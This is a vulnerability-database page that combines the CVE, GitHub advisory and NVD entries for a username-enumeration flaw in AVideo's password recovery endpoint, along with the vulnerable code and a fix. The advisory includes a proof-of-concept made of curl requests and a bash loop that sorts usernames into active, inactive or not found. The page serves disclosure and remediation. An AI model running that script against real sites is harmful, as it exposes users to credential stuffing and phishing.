Vulnerability-Lookup

CVE-2026-33688 (GCVE-0-2026-33688)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:43 – Updated: 2026-03-24 14:10

Title

AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned — at scale and without solving any captcha — by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-204 - Observable Response Discrepancy

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/e42f54123b4…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33688",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T14:09:59.182545Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T14:10:04.402Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \u2014 at scale and without solving any captcha \u2014 by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-204",
              "description": "CWE-204: Observable Response Discrepancy",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:43:59.276Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157"
        }
      ],
      "source": {
        "advisory": "GHSA-m99f-mmvg-3xmx",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33688",
    "datePublished": "2026-03-23T18:43:59.276Z",
    "dateReserved": "2026-03-23T16:34:59.932Z",
    "dateUpdated": "2026-03-24T14:10:04.402Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33688\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T19:16:42.017\",\"lastModified\":\"2026-03-25T18:05:21.360\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \u2014 at scale and without solving any captcha \u2014 by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de v\u00eddeo de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint de recuperaci\u00f3n de contrase\u00f1a en \u0027objects/userRecoverPass.php\u0027 realiza comprobaciones de existencia de usuario y estado de cuenta antes de validar el captcha. Esto permite a un atacante no autenticado enumerar nombres de usuario v\u00e1lidos y determinar si las cuentas est\u00e1n activas, inactivas o baneadas \u2014 a escala y sin resolver ning\u00fan captcha \u2014 al observar tres respuestas de error JSON distintas. El commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-204\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33688\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T14:09:59.182545Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T14:09:53.831Z\"}}], \"cna\": {\"title\": \"AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint\", \"source\": {\"advisory\": \"GHSA-m99f-mmvg-3xmx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157\", \"name\": \"https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \\u2014 at scale and without solving any captcha \\u2014 by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-204\", \"description\": \"CWE-204: Observable Response Discrepancy\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T18:43:59.276Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33688\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T14:10:04.402Z\", \"dateReserved\": \"2026-03-23T16:34:59.932Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T18:43:59.276Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-M99F-MMVG-3XMX

Vulnerability from github – Published: 2026-03-25 19:53 – Updated: 2026-03-25 19:53

Summary

AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint

Details

Summary

The password recovery endpoint at objects/userRecoverPass.php performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned — at scale and without solving any captcha — by observing three distinct JSON error responses.

Details

In objects/userRecoverPass.php, the request flow is:

Line 11 — A User object is instantiated from unsanitized $_REQUEST['user'] with no authentication:

$user = new User(0, $_REQUEST['user'], false);

Lines 27-29 — If the user does not exist, a distinct error is returned immediately:

if (empty($user->getStatus())) {
    $obj->error = __("User not found");
    die(json_encode($obj));
}

Lines 31-33 — If the user exists but is not active, a different distinct error is returned:

if ($user->getStatus() !== 'a') {
    $obj->error = __("The user is not active");
    die(json_encode($obj));
}

Lines 37-41 — Captcha validation only occurs after both user enumeration checks:

if (empty($_REQUEST['captcha'])) {
    $obj->error = __("Captcha is empty");
} else {
    require_once 'captcha.php';
    $valid = Captcha::validation($_REQUEST['captcha']);

This ordering creates a reliable oracle: requests that hit the captcha check confirm the user exists and is active, while the two earlier error messages reveal non-existence or inactive status — all without requiring a valid captcha.

By contrast, the registration endpoint (objects/userCreate.json.php) correctly validates the captcha at lines 32-42 before performing any user existence checks, confirming this ordering in the password recovery endpoint is a bug.

No rate limiting (rateLimitByIP) or brute force protection (bruteForceBlock) is applied to this endpoint. The framework's session-based DDOS protection is trivially bypassed by omitting cookies (each request gets a fresh session).

PoC

# 1. Test a non-existent user — returns "User not found" without captcha
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=nonexistent_user_xyz&captcha=' | jq .error
# Response: "User not found"

# 2. Test a valid active user — passes user checks, hits captcha validation
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=admin&captcha=' | jq .error
# Response: "Captcha is empty"

# 3. Test an inactive/banned user (if one exists) — returns distinct status message
curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
  -d 'user=banned_user&captcha=' | jq .error
# Response: "The user is not active"

# 4. Bulk enumeration script — no captcha solving required
for user in admin root test user1 user2 moderator editor; do
  result=$(curl -s -X POST 'http://localhost/AVideo/objects/userRecoverPass.php' \
    -d "user=${user}&captcha=")
  error=$(echo "$result" | jq -r .error)
  if [ "$error" = "Captcha is empty" ]; then
    echo "[ACTIVE] $user"
  elif [ "$error" = "The user is not active" ]; then
    echo "[INACTIVE] $user"
  else
    echo "[NOT FOUND] $user"
  fi
done

Impact

Username enumeration: Attackers can determine which usernames are registered on the platform without any captcha or authentication barrier.
Account status disclosure: Attackers can distinguish between active, inactive, and non-existent accounts, revealing moderation/ban status.
Credential stuffing enablement: Confirmed valid usernames can be used in targeted password brute-force or credential stuffing attacks against the login endpoint.
Phishing: Knowledge of valid active accounts enables targeted social engineering attacks against real users.
No throttling: The absence of rate limiting on this endpoint allows high-speed automated enumeration.

Recommended Fix

Move the captcha validation before the user existence checks, and return a generic message regardless of user status:

// In objects/userRecoverPass.php, replace lines 26-41 with:

    header('Content-Type: application/json');

    // Validate captcha FIRST, before any user lookups
    if (empty($_REQUEST['captcha'])) {
        $obj->error = __("Captcha is empty");
        die(json_encode($obj));
    }
    require_once 'captcha.php';
    $valid = Captcha::validation($_REQUEST['captcha']);
    if (!$valid) {
        $obj->error = __("Your code is not valid");
        $obj->reloadCaptcha = true;
        die(json_encode($obj));
    }

    // After captcha passes, check user — but use generic message
    if (empty($user->getStatus()) || $user->getStatus() !== 'a' || empty($user->getEmail())) {
        // Generic message — do not reveal whether user exists or is active
        $obj->success = __("If this account exists, a recovery email has been sent");
        die(json_encode($obj));
    }

    // Proceed with actual password recovery...
    $recoverPass = $user->setRecoverPass();

Additionally, consider adding rateLimitByIP() to this endpoint as defense-in-depth.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33688"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-204"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T19:53:00Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks **before** validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \u2014 at scale and without solving any captcha \u2014 by observing three distinct JSON error responses.\n\n## Details\n\nIn `objects/userRecoverPass.php`, the request flow is:\n\n1. **Line 11** \u2014 A `User` object is instantiated from unsanitized `$_REQUEST[\u0027user\u0027]` with no authentication:\n```php\n$user = new User(0, $_REQUEST[\u0027user\u0027], false);\n```\n\n2. **Lines 27-29** \u2014 If the user does not exist, a distinct error is returned immediately:\n```php\nif (empty($user-\u003egetStatus())) {\n    $obj-\u003eerror = __(\"User not found\");\n    die(json_encode($obj));\n}\n```\n\n3. **Lines 31-33** \u2014 If the user exists but is not active, a different distinct error is returned:\n```php\nif ($user-\u003egetStatus() !== \u0027a\u0027) {\n    $obj-\u003eerror = __(\"The user is not active\");\n    die(json_encode($obj));\n}\n```\n\n4. **Lines 37-41** \u2014 Captcha validation only occurs **after** both user enumeration checks:\n```php\nif (empty($_REQUEST[\u0027captcha\u0027])) {\n    $obj-\u003eerror = __(\"Captcha is empty\");\n} else {\n    require_once \u0027captcha.php\u0027;\n    $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n```\n\nThis ordering creates a reliable oracle: requests that hit the captcha check confirm the user exists and is active, while the two earlier error messages reveal non-existence or inactive status \u2014 all without requiring a valid captcha.\n\nBy contrast, the registration endpoint (`objects/userCreate.json.php`) correctly validates the captcha at lines 32-42 **before** performing any user existence checks, confirming this ordering in the password recovery endpoint is a bug.\n\nNo rate limiting (`rateLimitByIP`) or brute force protection (`bruteForceBlock`) is applied to this endpoint. The framework\u0027s session-based DDOS protection is trivially bypassed by omitting cookies (each request gets a fresh session).\n\n## PoC\n\n```bash\n# 1. Test a non-existent user \u2014 returns \"User not found\" without captcha\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=nonexistent_user_xyz\u0026captcha=\u0027 | jq .error\n# Response: \"User not found\"\n\n# 2. Test a valid active user \u2014 passes user checks, hits captcha validation\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=admin\u0026captcha=\u0027 | jq .error\n# Response: \"Captcha is empty\"\n\n# 3. Test an inactive/banned user (if one exists) \u2014 returns distinct status message\ncurl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n  -d \u0027user=banned_user\u0026captcha=\u0027 | jq .error\n# Response: \"The user is not active\"\n\n# 4. Bulk enumeration script \u2014 no captcha solving required\nfor user in admin root test user1 user2 moderator editor; do\n  result=$(curl -s -X POST \u0027http://localhost/AVideo/objects/userRecoverPass.php\u0027 \\\n    -d \"user=${user}\u0026captcha=\")\n  error=$(echo \"$result\" | jq -r .error)\n  if [ \"$error\" = \"Captcha is empty\" ]; then\n    echo \"[ACTIVE] $user\"\n  elif [ \"$error\" = \"The user is not active\" ]; then\n    echo \"[INACTIVE] $user\"\n  else\n    echo \"[NOT FOUND] $user\"\n  fi\ndone\n```\n\n## Impact\n\n- **Username enumeration**: Attackers can determine which usernames are registered on the platform without any captcha or authentication barrier.\n- **Account status disclosure**: Attackers can distinguish between active, inactive, and non-existent accounts, revealing moderation/ban status.\n- **Credential stuffing enablement**: Confirmed valid usernames can be used in targeted password brute-force or credential stuffing attacks against the login endpoint.\n- **Phishing**: Knowledge of valid active accounts enables targeted social engineering attacks against real users.\n- **No throttling**: The absence of rate limiting on this endpoint allows high-speed automated enumeration.\n\n## Recommended Fix\n\nMove the captcha validation before the user existence checks, and return a generic message regardless of user status:\n\n```php\n// In objects/userRecoverPass.php, replace lines 26-41 with:\n\n    header(\u0027Content-Type: application/json\u0027);\n\n    // Validate captcha FIRST, before any user lookups\n    if (empty($_REQUEST[\u0027captcha\u0027])) {\n        $obj-\u003eerror = __(\"Captcha is empty\");\n        die(json_encode($obj));\n    }\n    require_once \u0027captcha.php\u0027;\n    $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n    if (!$valid) {\n        $obj-\u003eerror = __(\"Your code is not valid\");\n        $obj-\u003ereloadCaptcha = true;\n        die(json_encode($obj));\n    }\n\n    // After captcha passes, check user \u2014 but use generic message\n    if (empty($user-\u003egetStatus()) || $user-\u003egetStatus() !== \u0027a\u0027 || empty($user-\u003egetEmail())) {\n        // Generic message \u2014 do not reveal whether user exists or is active\n        $obj-\u003esuccess = __(\"If this account exists, a recovery email has been sent\");\n        die(json_encode($obj));\n    }\n\n    // Proceed with actual password recovery...\n    $recoverPass = $user-\u003esetRecoverPass();\n```\n\nAdditionally, consider adding `rateLimitByIP()` to this endpoint as defense-in-depth.",
  "id": "GHSA-m99f-mmvg-3xmx",
  "modified": "2026-03-25T19:53:00Z",
  "published": "2026-03-25T19:53:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33688"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has Pre-Captcha User Enumeration and Account Status Disclosure in Password Recovery Endpoint"
}

FKIE_CVE-2026-33688

Vulnerability from fkie_nvd - Published: 2026-03-23 19:16 - Updated: 2026-03-25 18:05

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned \u2014 at scale and without solving any captcha \u2014 by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de v\u00eddeo de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint de recuperaci\u00f3n de contrase\u00f1a en \u0027objects/userRecoverPass.php\u0027 realiza comprobaciones de existencia de usuario y estado de cuenta antes de validar el captcha. Esto permite a un atacante no autenticado enumerar nombres de usuario v\u00e1lidos y determinar si las cuentas est\u00e1n activas, inactivas o baneadas \u2014 a escala y sin resolver ning\u00fan captcha \u2014 al observar tres respuestas de error JSON distintas. El commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contiene un parche."
    }
  ],
  "id": "CVE-2026-33688",
  "lastModified": "2026-03-25T18:05:21.360",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-23T19:16:42.017",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/e42f54123b460fd1b2ee01f2ce3d4a386e88d157"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-m99f-mmvg-3xmx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-204"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33688 (GCVE-0-2026-33688)

GHSA-M99F-MMVG-3XMX

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-33688

Tags

Sightings

Nomenclature